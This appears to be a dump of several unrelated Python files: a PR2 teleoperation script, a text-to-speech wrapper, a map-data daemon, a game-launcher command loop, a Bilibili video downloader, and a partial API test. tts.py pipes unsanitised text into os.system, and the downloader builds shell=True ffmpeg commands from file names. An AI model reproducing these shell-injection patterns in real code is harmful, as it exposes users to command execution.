| source | python |
|---|---|
teleop_pr2.py
|
#!/usr/bin/env python
from __future__ import print_function
import select
import sys
import termios
import tty
from pb_planning.pybullet_tools.pr2_utils import PR2_GROUPS, DRAKE_PR2_URDF
from pb_planning.pybullet_tools import add_data_path, connect, enable_gravity, load_model, \
joints_from_names, load_pybullet, \
velocity_control_joints, disconnect, enable_real_time, HideOutput
HELP_MSG = """
Reading from the keyboard and Publishing to Twist!
---------------------------
Moving around:
u i o
j k l
m , .
For Holonomic mode (strafing), hold down the shift key:
---------------------------
U I O
J K L
M < >
t : up (+z)
b : down (-z)
anything else : stop
q/z : increase/decrease max speeds by 10%
w/x : increase/decrease only linear speed by 10%
e/c : increase/decrease only angular speed by 10%
CTRL-C to quit
"""
MOVE_BINDINGS = {
'i': (1, 0, 0, 0),
'o': (1, 0, 0, -1),
'j': (0, 0, 0, 1),
'l': (0, 0, 0, -1),
'u': (1, 0, 0, 1),
',': (-1, 0, 0, 0),
'.': (-1, 0, 0, 1),
'm': (-1, 0, 0, -1),
'O': (1, -1, 0, 0),
'I': (1, 0, 0, 0),
'J': (0, 1, 0, 0),
'L': (0, -1, 0, 0),
'U': (1, 1, 0, 0),
'<': (-1, 0, 0, 0),
'>': (-1, -1, 0, 0),
'M': (-1, 1, 0, 0),
't': (0, 0, 1, 0),
'b': (0, 0, -1, 0),
}
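# Key -> (linear, angular) scale factors applied to the current speed and turn rate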
SPEED_BINDINGS = {
'q': (1.1, 1.1),
'z': (.9, .9),
'w': (1.1, 1),
'x': (.9, 1),
'e': (1, 1.1),
'c': (1, .9),
}
ESCAPE = '\x03'  # Ctrl-C
#####################################
def get_key(settings):
tty.setraw(sys.stdin.fileno())
select.select([sys.stdin], [], [], 0)
key = sys.stdin.read(1)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
def print_velocities(speed, turn):
print("Speed: {} | Turn: {} ".format(speed, turn))
#####################################
def run_simulate(pr2):
joints = joints_from_names(pr2, PR2_GROUPS['base'])
dx = dy = dz = dth = 1
speed, turn = 0.5, 1.0
while True:
velocities = [dx * speed, dy * speed, dth * turn]
velocity_control_joints(pr2, joints, velocities)
def run_thread(pr2):
joints = joints_from_names(pr2, PR2_GROUPS['base'])
dx = dy = dz = dth = 0
speed, turn = 0.5, 1.0
settings = termios.tcgetattr(sys.stdin)
try:
print(HELP_MSG)
print_velocities(speed, turn)
while True: # TODO: getKeyboardEvents
key = get_key(settings) # Waits until a key is read
if key in MOVE_BINDINGS:
dx, dy, dz, dth = MOVE_BINDINGS[key]
elif key in SPEED_BINDINGS:
mspeed, mturn = SPEED_BINDINGS[key]
speed *= mspeed
turn *= mturn
print_velocities(speed, turn)
else: # When it receives another key
dx = dy = dz = dth = 0
if key == ESCAPE:
break
# twist.linear.dz = dz * speed
velocities = [dx * speed, dy * speed, dth * turn]
velocity_control_joints(pr2, joints, velocities)
except Exception as e:
print(e)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
#####################################
def main():
# https://github.com/ros-teleop/teleop_twist_keyboard
# http://openrave.org/docs/latest_stable/_modules/openravepy/misc/#SetViewerUserThread
connect(use_gui=True)
add_data_path()
load_pybullet("plane.urdf")
#load_pybullet("models/table_collision/table.urdf")
with HideOutput():
pr2 = load_model(DRAKE_PR2_URDF, fixed_base=True)
enable_gravity()
enable_real_time() # TODO: won't work as well on OS X due to simulation thread
#run_simulate(pr2)
run_thread(pr2)
# TODO: keep working on this
#userthread = threading.Thread(target=run_thread, args=[pr2])
#userthread.start()
#userthread.join()
disconnect()
if __name__=="__main__":
main()
|
tts.py
|
import os
from threading import Thread
music_level = 30
class TTS():
def __init__(self, frontend, config):
self.frontend = frontend
def speak_text(self, text):
t = Thread(target=self.speak_text_thread, args=(text,))
t.start()
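# Worker run on the background thread: pipe the text to the festival TTS engine through the shell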
def speak_text_thread(self, text):
os.system(' echo "' + text + '" | festival --tts')
|
mapd.py
|
#!/usr/bin/env python
# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
from common.basedir import BASEDIR
try:
from scipy import spatial
except ImportError as e:
import os
import sys
openblas_path = os.path.join(BASEDIR, "phonelibs/openblas/")
os.environ['LD_LIBRARY_PATH'] += ':' + openblas_path
args = [sys.executable]
args.extend(sys.argv)
os.execv(sys.executable, args)
DEFAULT_SPEEDS_BY_REGION_JSON_FILE = BASEDIR + "/selfdrive/mapd/default_speeds_by_region.json"
from selfdrive.mapd import default_speeds_generator
default_speeds_generator.main(DEFAULT_SPEEDS_BY_REGION_JSON_FILE)
import os
import sys
import time
import zmq
import threading
import numpy as np
import overpy
from collections import defaultdict
from common.params import Params
from common.transformations.coordinates import geodetic2ecef
from selfdrive.services import service_list
import selfdrive.messaging as messaging
from selfdrive.mapd.mapd_helpers import MAPS_LOOKAHEAD_DISTANCE, Way, circle_through_points
import selfdrive.crash as crash
from selfdrive.version import version, dirty
OVERPASS_API_URL = "https://overpass.kumi.systems/api/interpreter"
OVERPASS_HEADERS = {
'User-Agent': 'NEOS (comma.ai)',
'Accept-Encoding': 'gzip'
}
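# Module-level state shared between query_thread (Overpass fetcher) and mapsd_thread (GPS consumer); guarded by query_lock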
last_gps = None
query_lock = threading.Lock()
last_query_result = None
last_query_pos = None
cache_valid = False
def build_way_query(lat, lon, radius=50):
"""Builds a query to find all highways within a given radius around a point"""
pos = " (around:%f,%f,%f)" % (radius, lat, lon)
lat_lon = "(%f,%f)" % (lat, lon)
q = """(
way
""" + pos + """
[highway][highway!~"^(footway|path|bridleway|steps|cycleway|construction|bus_guideway|escape)$"];
>;);out;""" + """is_in""" + lat_lon + """;area._[admin_level~"[24]"];
convert area ::id = id(), admin_level = t['admin_level'],
name = t['name'], "ISO3166-1:alpha2" = t['ISO3166-1:alpha2'];out;
"""
return q
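# Example: q = build_way_query(lat, lon, radius=3000), as used in query_thread below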
def query_thread():
global last_query_result, last_query_pos, cache_valid
api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=10.)
while True:
time.sleep(1)
if last_gps is not None:
fix_ok = last_gps.flags & 1
if not fix_ok:
continue
if last_query_pos is not None:
cur_ecef = geodetic2ecef((last_gps.latitude, last_gps.longitude, last_gps.altitude))
prev_ecef = geodetic2ecef((last_query_pos.latitude, last_query_pos.longitude, last_query_pos.altitude))
dist = np.linalg.norm(cur_ecef - prev_ecef)
if dist < 1000:  # only re-query once we have moved at least 1 km from the last query position
continue
if dist > 3000:
cache_valid = False
q = build_way_query(last_gps.latitude, last_gps.longitude, radius=3000)
try:
new_result = api.query(q)
# Build kd-tree
nodes = []
real_nodes = []
node_to_way = defaultdict(list)
location_info = {}
for n in new_result.nodes:
nodes.append((float(n.lat), float(n.lon), 0))
real_nodes.append(n)
for way in new_result.ways:
for n in way.nodes:
node_to_way[n.id].append(way)
for area in new_result.areas:
if area.tags.get('admin_level', '') == "2":
location_info['country'] = area.tags.get('ISO3166-1:alpha2', '')
if area.tags.get('admin_level', '') == "4":
location_info['region'] = area.tags.get('name', '')
nodes = np.asarray(nodes)
nodes = geodetic2ecef(nodes)
tree = spatial.cKDTree(nodes)
query_lock.acquire()
last_query_result = new_result, tree, real_nodes, node_to_way, location_info
last_query_pos = last_gps
cache_valid = True
query_lock.release()
except Exception as e:
print(e)
query_lock.acquire()
last_query_result = None
query_lock.release()
def mapsd_thread():
global last_gps
context = zmq.Context()
gps_sock = messaging.sub_sock(context, service_list['gpsLocation'].port, conflate=True)
gps_external_sock = messaging.sub_sock(context, service_list['gpsLocationExternal'].port, conflate=True)
map_data_sock = messaging.pub_sock(context, service_list['liveMapData'].port)
cur_way = None
curvature_valid = False
curvature = None
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
while True:
gps = messaging.recv_one(gps_sock)
gps_ext = messaging.recv_one_or_none(gps_external_sock)
if gps_ext is not None:
gps = gps_ext.gpsLocationExternal
else:
gps = gps.gpsLocation
last_gps = gps
fix_ok = gps.flags & 1
if not fix_ok or last_query_result is None or not cache_valid:
cur_way = None
curvature = None
curvature_valid = False
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
map_valid = False
else:
map_valid = True
lat = gps.latitude
lon = gps.longitude
heading = gps.bearing
speed = gps.speed
query_lock.acquire()
cur_way = Way.closest(last_query_result, lat, lon, heading, cur_way)
if cur_way is not None:
pnts, curvature_valid = cur_way.get_lookahead(lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
xs = pnts[:, 0]
ys = pnts[:, 1]
road_points = [float(x) for x in xs], [float(y) for y in ys]
if speed < 10:
curvature_valid = False
if curvature_valid and pnts.shape[0] <= 3:
curvature_valid = False
# The curvature is valid when at least MAPS_LOOKAHEAD_DISTANCE of road is found
if curvature_valid:
# Compute the curvature for each point
with np.errstate(divide='ignore'):
circles = [circle_through_points(*p) for p in zip(pnts, pnts[1:], pnts[2:])]
circles = np.asarray(circles)
radii = np.nan_to_num(circles[:, 2])
radii[radii < 10] = np.inf
curvature = 1. / radii
# Index of closest point
closest = np.argmin(np.linalg.norm(pnts, axis=1))
dist_to_closest = pnts[closest, 0] # We can use x distance here since it should be close
# Compute distance along path
dists = list()
dists.append(0)
for p, p_prev in zip(pnts, pnts[1:, :]):
dists.append(dists[-1] + np.linalg.norm(p - p_prev))
dists = np.asarray(dists)
dists = dists - dists[closest] + dist_to_closest
dists = dists[1:-1]
close_idx = np.logical_and(dists > 0, dists < 500)
dists = dists[close_idx]
curvature = curvature[close_idx]
if len(curvature):
# TODO: Determine left or right turn
curvature = np.nan_to_num(curvature)
# Outlier rejection
new_curvature = np.percentile(curvature, 90, interpolation='lower')
k = 0.6
upcoming_curvature = k * upcoming_curvature + (1 - k) * new_curvature
in_turn_indices = curvature > 0.8 * new_curvature
if np.any(in_turn_indices):
dist_to_turn = np.min(dists[in_turn_indices])
else:
dist_to_turn = 999
else:
upcoming_curvature = 0.
dist_to_turn = 999
query_lock.release()
dat = messaging.new_message()
dat.init('liveMapData')
if last_gps is not None:
dat.liveMapData.lastGps = last_gps
if cur_way is not None:
dat.liveMapData.wayId = cur_way.id
# Speed limit
max_speed = cur_way.max_speed()
if max_speed is not None:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = max_speed
# TODO: use the function below to anticipate upcoming speed limits
#max_speed_ahead, max_speed_ahead_dist = cur_way.max_speed_ahead(max_speed, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
#if max_speed_ahead is not None and max_speed_ahead_dist is not None:
# dat.liveMapData.speedLimitAheadValid = True
# dat.liveMapData.speedLimitAhead = float(max_speed_ahead)
# dat.liveMapData.speedLimitAheadDistance = float(max_speed_ahead_dist)
advisory_max_speed = cur_way.advisory_max_speed()
if advisory_max_speed is not None:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = advisory_max_speed
# Curvature
dat.liveMapData.curvatureValid = curvature_valid
dat.liveMapData.curvature = float(upcoming_curvature)
dat.liveMapData.distToTurn = float(dist_to_turn)
if road_points is not None:
dat.liveMapData.roadX, dat.liveMapData.roadY = road_points
if curvature is not None:
dat.liveMapData.roadCurvatureX = [float(x) for x in dists]
dat.liveMapData.roadCurvature = [float(x) for x in curvature]
dat.liveMapData.mapValid = map_valid
map_data_sock.send(dat.to_bytes())
def main(gctx=None):
params = Params()
dongle_id = params.get("DongleId")
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
crash.install()
main_thread = threading.Thread(target=mapsd_thread)
main_thread.daemon = True
main_thread.start()
q_thread = threading.Thread(target=query_thread)
q_thread.daemon = True
q_thread.start()
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
LauncherCommand.py
|
from command import *
import threading
import re
from typing import Dict
from enum import Enum, auto
# TODO: move CMDCode to another file and import it here
class CMDCode(Enum):
EXT = auto()
FIND_MATCH = auto()
CANCEL = auto()
ACCEPT = auto()
DECLINE = auto()
SAVE = auto()
AL_BANS = auto()
EN_BANS = auto()
HOVER = auto()
GET_HOVER = auto()
AL_PICKS = auto()
EN_PICKS = auto()
MY_POS = auto()
COMPLETE = auto()
INIT_STATE = auto()
DEINIT_STATE = auto()
SEND_MESSAGES = auto()
class LauncherCommand:
'''Maps each CMDCode to the command strings that trigger it.'''
CMD = {
CMDCode.EXT: ['exit'],
CMDCode.FIND_MATCH: ['findmatch', 'fm'],
CMDCode.CANCEL: ['cancel', 'c', 'd'],
CMDCode.ACCEPT: ['accept', 'acc', 'ok'],
CMDCode.DECLINE: ['decline', 'c', 'd'],
CMDCode.SAVE: ['save', 's'],
CMDCode.AL_BANS: ['getAllyBans', 'alb'],
CMDCode.EN_BANS: ['getEnemyBans', 'enb'],
CMDCode.HOVER: ['hover', 'h'],
CMDCode.GET_HOVER: ['getHover', 'H'],
CMDCode.AL_PICKS: ['getAllyPicks', 'gap'],
CMDCode.EN_PICKS: ['getEnemyPicks', 'gep'],
CMDCode.MY_POS: ['getMyPosition', 'gmp'],
CMDCode.COMPLETE: ['complete', 'ok'],
CMDCode.INIT_STATE: ['start', 'st', 'init'],
CMDCode.DEINIT_STATE: ['stop', 'terminate', 'term', 'deinit'],
CMDCode.SEND_MESSAGES: ['send', 'M', 'message']
}
user_accounts: Dict[str, str] = {}
def __init__(self):
self.command: Command = None
@classmethod
def set_command(cls, command: Command):
if isinstance(command, Command):
cls.command = command
@classmethod
def update_user_accounts(cls, new_account: Dict[str, str]):
cls.user_accounts.update(new_account)
@classmethod
def execute_command(cls):
try:
cls.command.execute()
except Exception as e:
print(Command.ERR_S, e, sep=' ')
@classmethod
def find_match(cls):
cls.set_command(MatchFinder())
cls.execute_command()
@classmethod
def cancel(cls):
cls.set_command(Canceller())
cls.execute_command()
@classmethod
def accept(cls):
cls.set_command(Acceptor())
cls.execute_command()
@classmethod
def decline(cls):
cls.set_command(Decliner())
cls.execute_command()
@classmethod
def save_to_file(cls, what, filename):
cls.set_command(
WS_JSONSaver(
spinner=what,
textinput=filename
)
)
cls.execute_command()
@classmethod
def get_ally_bans(cls):
cls.set_command(AllyBansGetter())
cls.execute_command()
@classmethod
def get_enemy_bans(cls):
cls.set_command(EnemyBansGetter())
cls.execute_command()
@classmethod
def hover(cls, arg):
cls.set_command(Hover(champion=arg))
cls.execute_command()
@classmethod
def get_hover(cls):
cls.set_command(HoverGetter())
cls.execute_command()
@classmethod
def get_my_team_champs(cls):
cls.set_command(MyTeamChampsGetter())
cls.execute_command()
@classmethod
def get_enemy_team_champs(cls):
cls.set_command(EnemyTeamChampsGetter())
cls.execute_command()
@classmethod
def get_my_position(cls):
cls.set_command(MyPositionGetter())
cls.execute_command()
@classmethod
def complete(cls):
cls.set_command(Complete())
cls.execute_command()
@classmethod
def init(cls):
cls.set_command(InitState())
cls.execute_command()
@classmethod
def deinit(cls):
cls.set_command(DeinitState())
cls.execute_command()
@classmethod
def default_action(cls):
print(Command.INFO_S,
'For this button an action has not been set yet.',
sep=' ')
@classmethod
def send_messages(cls, event_type: str):
# just for testing purposes
cls.set_command(MessagesSender(user_accounts=cls.user_accounts, event_type=event_type))
cls.execute_command()
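# Read commands from stdin in a loop and dispatch each one to the matching class method above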
def start(self):
regex = r'\w+'
while True:
_input = input('$>')
matches = re.findall(regex, _input)
if not matches: continue  # ignore empty input instead of raising IndexError
_cmd = matches[0]  # command string
if _cmd in self.CMD[CMDCode.EXT]:
break
elif _cmd in self.CMD[CMDCode.FIND_MATCH]:
LauncherCommand.find_match()
elif _cmd in self.CMD[CMDCode.CANCEL]:
LauncherCommand.cancel()
elif _cmd in self.CMD[CMDCode.SAVE]:
try:
LauncherCommand.save_to_file(what=matches[1],
filename=matches[2])
except IndexError:
print(Command.ERR_S, 'provide an argument')
elif _cmd in self.CMD[CMDCode.AL_BANS]:
LauncherCommand.get_ally_bans()
elif _cmd in self.CMD[CMDCode.EN_BANS]:
LauncherCommand.get_enemy_bans()
elif _cmd in self.CMD[CMDCode.HOVER]:
try:
LauncherCommand.hover(matches[1])
except IndexError:
print(Command.ERR_S, 'provide an argument')
elif _cmd in self.CMD[CMDCode.GET_HOVER]:
LauncherCommand.get_hover()
elif _cmd in self.CMD[CMDCode.AL_PICKS]:
LauncherCommand.get_my_team_champs()
elif _cmd in self.CMD[CMDCode.EN_PICKS]:
LauncherCommand.get_enemy_team_champs()
elif _cmd in self.CMD[CMDCode.MY_POS]:
LauncherCommand.get_my_position()
elif _cmd in self.CMD[CMDCode.COMPLETE]:
LauncherCommand.complete()
elif _cmd in self.CMD[CMDCode.INIT_STATE]:
LauncherCommand.init()
elif _cmd in self.CMD[CMDCode.DEINIT_STATE]:
LauncherCommand.deinit()
elif _cmd in self.CMD[CMDCode.SEND_MESSAGES]:
try:
LauncherCommand.send_messages(matches[1])
except IndexError:
print(Command.ERR_S, 'provide an argument')
else:
LauncherCommand.default_action()
# class ConsoleController:
# '''This class provides a method which starts an infinite loop
# that reads input from the user and runs the relevant method of a
# LauncherCommand class instance.'''
# def __init__(self):
# self.command: LauncherCommand = LauncherCommand()
# def start(self):
# while True:
# _input = input('$>')
# if _input == 'exit':
# break
# if _input == 'findmatch':
# self.command.find_match()
# # old code, not relevant
# if __name__ == '__main__':
# import time
# cc = ConsoleController()
# t = threading.Thread(target=cc.start)
# t.daemon = True
# t.start()
# for i in range(10):
# time.sleep(.4)
# print(f'counter: {i}')
|
bilibili3.py
|
import requests
import re
import json
import os
import click
import threading
import shutil
import subprocess
import time
import math
sep = os.sep
# Requires ffmpeg
# Some resources are rate-limited by the server ╭(╯^╰)╮
# To download premium-member bangumi or 1080P+ streams, put a premium account cookie into the headers
class Bilibili:
def __init__(self, ss, sessData='', savePath: str = 'download', func=None):
self.ss = ss
self.base_url = f"https://www.bilibili.com/bangumi/play/{ss}"
self.headers = {
"Referer": f"https://www.bilibili.com/bangumi/play/{ss}/",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1",
# After logging in to Bilibili, copy the SESSDATA field from your cookie; it is valid for one month
'Cookie': 'SESSDATA={}'.format(sessData),
}
savePath = savePath+sep+'番剧'
self._savePath = savePath
self.savePath = savePath + sep + ss + sep
self.func = func
self.total = 0
self.index = 0
self.name = ''
self.tasks = 0
self.taskFile = self.savePath + 'task.txt'
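# callback/callback2/callbackMsg forward episode progress, byte-level progress and log messages to the optional UI hook self.func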
def callback(self, typeName, title=None):
if self.func:
self.func({
'type': 'data',
'name': self.name,
'total': self.total,
'index': self.index,
'title': title,
})
def callback2(self, total, index, title=None):
if index > total:
index = total
if self.func:
self.func({
'type': 'progress',
'name': self.name,
'total': total,
'index': index,
'title': title,
})
def callbackMsg(self, msg, color=None):
if self.func:
self.func({
'type': 'msg',
'msg': msg,
'color': color,
})
def printMsg(self, msg, color=None):
if self.func:
self.callbackMsg(msg, color)
else:
print(msg)
def filterName(self, name):
regexp = re.compile(r'(/|\\|:|\?|\*|\||"|\'|<|>|\$)')
space = re.compile(r'\s{2,}')
return space.sub(" ", regexp.sub("", name))
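# Example: filterName('a/b:  c?') -> 'ab c' (illegal filename characters removed, repeated whitespace collapsed)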
# Get cid, bv_id, ep_id and the current episode count
def get_params(self):
rep = requests.get(self.base_url)
name = re.findall(r'"name": "(.+?)",', rep.text)
if not name:
self.printMsg(f'\n{self.ss} 番号解析失败 ××××××××××××××××', color='err')
return []
name = self.filterName(name[0])
config = re.findall(
r'window.__INITIAL_STATE__=({.+?)]};', rep.text, re.S)[0] + ']}'
epList = json.loads(config)['epList']
self.savePath = self._savePath + sep + name + sep
self.taskFile = self.savePath + 'task.txt'
arr = []
for ep in epList:
arr.append({
'name': self.filterName(f'{name} {ep["titleFormat"]} {ep["longTitle"]}'),
'cid': ep['cid'],
'bvid': ep['bvid'],
'epid': ep['id'],
'cover': 'https:' + ep['cover']
})
return arr
def checkDir(self):
try:
os.makedirs(self.savePath + self.ss)
except FileExistsError:
pass
# os.chdir(self.ss)
def rmPiecesDir(self):
try:
shutil.rmtree(self.savePath + self.ss)
os.remove(self.taskFile)
except:
pass
else:
pass
def getFileByUrl(self, url, filename, title):
self.printMsg(f"\n【{title}】 正在下载")
pindex = 0
if os.path.isfile(filename):
fsize = os.path.getsize(filename)
pindex += fsize
repsize = requests.get(url, headers=self.headers, stream=True)
total_size = int(repsize.headers['Content-Length'])
if abs(fsize-total_size) < 500:
self.printMsg('\n【' + filename +
'】 '+' 文件已存在', color='warn')
self.index += 1
self.callback('data', title)
return True
else:
self.headers['Range'] = 'bytes='+str(fsize)+'-'
with requests.get(url, headers=self.headers, stream=True) as rep:
file_size = int(rep.headers['Content-Length'])
if not rep.status_code in [200, 206]:
self.printMsg(f"\n【{title}】 下载失败", color='err')
self.index += 1
self.callback('data')
return False
label = '{:.2f}MB'.format(file_size / (1024 * 1024))
if self.func:
with open(filename, "ab") as f:
for chunk in rep.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
f.flush()
pindex += 1024
self.callback2(file_size, pindex, title=title)
else:
with click.progressbar(length=file_size, label=label) as progressbar:
progressbar.update(pindex)
with open(filename, "ab") as f:
for chunk in rep.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
f.flush()
progressbar.update(1024)
pindex += 1024  # advance by the 1024-byte chunk size
if pindex > file_size:
pindex = file_size
self.callback2(file_size, pindex, title=title)
self.printMsg(f"【{title}】 下载成功\n", color='success')
self.printMsg(f"\n 休息一下", color='warn')
self.index += 1
self.callback('data', title=title)
return True
def getVideoFormat(self):
return 'mp4'
def concatContent(self, filename):
content = "file '"+filename+"'\n"
return content
def writeConcatFile(self, content):
with open(self.taskFile, 'w', encoding='utf-8') as f:
f.write(content)
def videoMerge(self, taskFile, output, title=''):
self.printMsg(f"\n【{title}】 分块视频合并中....................")
self.callback('data', '合并中..')
sentence = 'ffmpeg -loglevel error -f concat -safe 0 -i "{}" -c copy "{}.{}" -y'.format(
taskFile, output, self.getVideoFormat())
child = subprocess.Popen(sentence, shell=True)
child.wait()
self.printMsg(f"\n【{title}】 分块视频合并完成....................")
def combineAV(self, videoFile, audioFile, output, title):
self.printMsg(f"\n【{title}】 音频合并中....................")
self.callback('data', '合并中..')
sentence = 'ffmpeg -loglevel error -i "{}" -i "{}" -c copy "{}.{}" -y'.format(
videoFile, audioFile, output, self.getVideoFormat())
child = subprocess.Popen(sentence, shell=True)
child.wait()
self.printMsg(f"【{title}】 音频合并完成....................")
def downloadPieces(self, data, title=''):
if os.path.isfile(self.savePath +
title + "." + self.getVideoFormat()):
self.printMsg('\n【' + self.savePath +
title + "." + self.getVideoFormat()+' 文件已存在', color='warn')
self.index += len(data['result']['durl'])+1
self.callback('data', title)
self.tasks -= 1
return True
threads = []
filepaths = []
try:
self.checkDir()
task_content = ''
for info in data['result']['durl']:
filename = self.savePath + self.ss + sep + self.ss + '_' + title + \
'_' + str(info['order']) + "." + self.getVideoFormat()
t = threading.Thread(target=self.getFileByUrl, args=(
info['url'], filename, title + ' 分块 ' + str(info['order'])))
threads.append(t)
t.setDaemon(True)
t.start()
filepaths.append(filename)
task_content += self.concatContent(filename)
for t in threads:
t.join()
if task_content != '':
try:
self.writeConcatFile(task_content)
self.videoMerge(self.taskFile, self.savePath +
title, title)
except BaseException as e:
self.printMsg(f"{e}", color='err')
self.index += 1
self.callback('data')
except BaseException:
pass
self.tasks -= 1
for path in filepaths:
os.remove(path)
# self.rmPiecesDir()
pass
def downloadAudioAndVideo(self, text, item):
if os.path.isfile(item["savePath"]):
self.printMsg('\n【' + item["savePath"] +
'】 '+' 文件已存在', color='warn')
self.index += 2
self.callback('data')
self.tasks -= 1
return
video = self.getFileByUrl(
text['result']['dash']['video'][0]['base_url'], item['videoPath'], item['name'] + " 视频部分")
audio = self.getFileByUrl(
text['result']['dash']['audio'][0]['base_url'], item['audioPath'], item['name'] + " 音频部分")
if video and audio:
try:
self.printMsg(f"\n【{item['name']}】 视频+音频 开始合并")
self.callback('data', '合并中..')
child = subprocess.Popen(
f'ffmpeg -loglevel error -i "{item["videoPath"]}" -i "{item["audioPath"]}" -vcodec copy -acodec copy "{item["savePath"]}" -y', shell=True)
child.wait()
self.printMsg(f"【{item['name']}】 视频+音频 合并成功")
except BaseException as e:
self.printMsg(f"【{item['name']}】 {e}", color='err')
pass
try:
os.remove(item['videoPath'])
os.remove(item['audioPath'])
except BaseException:
pass
self.tasks -= 1
self.index += 1
self.callback('data')
# self.rmPiecesDir()
def downCover(self, data, path, title):
self.getFileByUrl(data, path, title)
self.tasks -= 1
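# Entry point: fetch the episode list, query each play URL, then download covers, DASH audio/video or segmented videos and merge them with ffmpeg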
def run(self):
eplist = self.get_params()
self.checkDir()
self.total = 1
self.index = 0
self.callback('data', title='拉取数据中.')
data = []
for ep in eplist:
rep = requests.get(f"https://api.bilibili.com/pgc/player/web/playurl?cid={ep['cid']}&qn=112&type=&otype=json&fourk=1&bvid={ep['bvid']}&ep_id={ep['epid']}&fnver=0&fnval=16&session=6665a83430e196a488e4786293452817",
headers=self.headers)
text = json.loads(rep.text)
if text['code'] == 0:
item = {
'title': ep['name'],
'name': ep['name'],
'videoPath': self.savePath + ep['name'] + '_video.mp4',
'audioPath': self.savePath + ep['name'] + '_audio.mp3',
'savePath': self.savePath + ep['name'] + '.mp4',
'data': text
}
if ep['cover']:
self.total += 1
data.append({
'type': '3',
'path': self.savePath + ep['name'] + '.jpg',
'title': ep['name'] + '封面',
'name': ep['name'],
'data': ep['cover']
})
if 'dash' in text['result']:
self.total += 3
data.append({
'type': '1',
'title': ep['name'],
'name': ep['name'],
'videoPath': self.savePath + ep['name'] + '_video.mp4',
'audioPath': self.savePath + ep['name'] + '_audio.mp3',
'savePath': self.savePath + ep['name'] + '.mp4',
'data': text
})
else:
self.total += len(text['result']['durl']) + 1
item['data'] = text
item['type'] = '2'
data.append({
'type': '2',
'title': ep['name'],
'name': ep['name'],
'data': text
})
self.printMsg(
f'{ep["name"]} 数据拉取成功√√√√√√√√√√√√√√√√√√√', color='success')
else:
self.printMsg(
f'{ep["name"]} 数据拉取失败:!!!!{text["message"]}!!!! ××××××××××××××××', color='err')
self.callback('data', title='拉取数据...')
self.printMsg(
f'休息一下', color='warn')
time.sleep(0.1)
self.callback('data', title='开始下载...')
'''
length = len(data)-1
_tasks = []
while length >= 0:
if self.tasks < 5:
item = data[length]
t = None
if item['type'] == '1':
t = threading.Thread(
target=self.downloadAudioAndVideo, args=(item['data'], item))
t.setDaemon(True)
t.start()
_tasks.append(t)
# spawns.append(gevent.spawn(self.downloadAudioAndVideo, item['data'], item['item']))
# self.downloadAudioAndVideo(item['data'], item)
elif item['type'] == '2':
# spawns.append(gevent.spawn(self.downloadPieces,item['data'], item['title']))
# self.downloadPieces(item['data'], item['title'])
t = threading.Thread(target=self.downloadPieces, args=(
item['data'], item['title']))
t.setDaemon(True)
t.start()
_tasks.append(t)
elif item['type'] == '3':
# spawns.append(gevent.spawn(self.getFileByUrl,item['data'], item['path'], item['title']))
# self.getFileByUrl(item['data'], item['path'], item['title'])
t = threading.Thread(target=self.downCover, args=(
item['data'], item['path'], item['title']))
t.setDaemon(True)
t.start()
_tasks.append(t)
self.tasks += 1
length -= 1
else:
time.sleep(0.1)
for t in _tasks:
t.join()
'''
for item in data:
if item['type'] == '1':
# spawns.append(gevent.spawn(self.downloadAudioAndVideo, item['data'], item['item']))
self.downloadAudioAndVideo(item['data'], item)
elif item['type'] == '2':
# spawns.append(gevent.spawn(self.downloadPieces,item['data'], item['title']))
self.downloadPieces(item['data'], item['title'])
elif item['type'] == '3':
# spawns.append(gevent.spawn(self.getFileByUrl,item['data'], item['path'], item['title']))
self.getFileByUrl(item['data'], item['path'], item['title'])
self.rmPiecesDir()
def get(url: str, savepath: str = 'download', func=None, sessData: str = '') -> dict:
bv = re.findall(r'(BV[0-9a-zA-Z]*)', url)
ss = re.findall(r'play/(ss[0-9a-zA-Z]*)', url)
ep = re.findall(r'play/(ep[0-9a-zA-Z]*)', url)
bv = bv or ss or ep
if bv:
bv = bv[0]
tool = Bilibili(bv, sessData,
savepath, func=func)
tool.name = url
tool.run()
else:
print('\n解析失败')  # self is not defined inside get(), so fall back to a plain print
data = {}
data["imgs"] = []
data["videos"] = []
data["m4s"] = []
return data
|
test_api.py
|
#!/usr/bin/env python
# coding=utf-8
import json
import threading
import time
import pymongo
import requests
from app import *
from nose.tools import with_setup
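# Note: pymongo.Connection and connection.disconnect() below are the legacy pymongo 2.x API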
def setup_func():
connection = pymongo.Connection("localhost", 27017)
db = connection.sillynews
db.user.insert({"username": "testUsername",
"password": "testPassword"})
connection.disconnect()
def teardown_func():
connection = pymongo.Connection("localhost", 27017)
connection.drop_database("sillynews")
connection.disconnect()
@with_setup(setup_func, teardown_func)
def test_news_api():
try:
server_thread = threading.Thread(target=run)
server_thread.setDaemon(False)
server_thread.start()
time.sleep(1)
# get the user cookie
r = requests.post("http://127.0.0.1:8888/login/",
data={"username": "testUsername",
"password": "testPassword"}, allow_redirects=False)
user_cookie = r.cookies
# test put
r = requests.put("http://127.0.0.1:8888/api/news/")
assert r.status_code == 403
news = {"title": "test_title",
"author": "test_author",
"date": "test_date",
"body": "test_body",
"column": "test_column"}
r = requests.put("http://127.0.0.1:8888/api/news/",
cookies=user_cookie,
data={"body": json.dumps(news)})
assert r.status_code == 200
# test get
r = requests.get("http://127.0.0.1:8888/api/news/",
params={"title": "test_title"})
news = r.json()
assert news["title"] == "test_title"
assert news["author"] == "test_author"
assert news["body"] == "test_body"
assert news["date"] == "test_date"
assert news["column"] == "test_column"
# test post
change_news = {"title": "test_title",
"author": "change_author",
"date": "change_date",
"body": "change_body",
"column": "change_column"}
r = requests.post("http://127.0.0.1:8888/api/news/",
cookies=user_cookie,
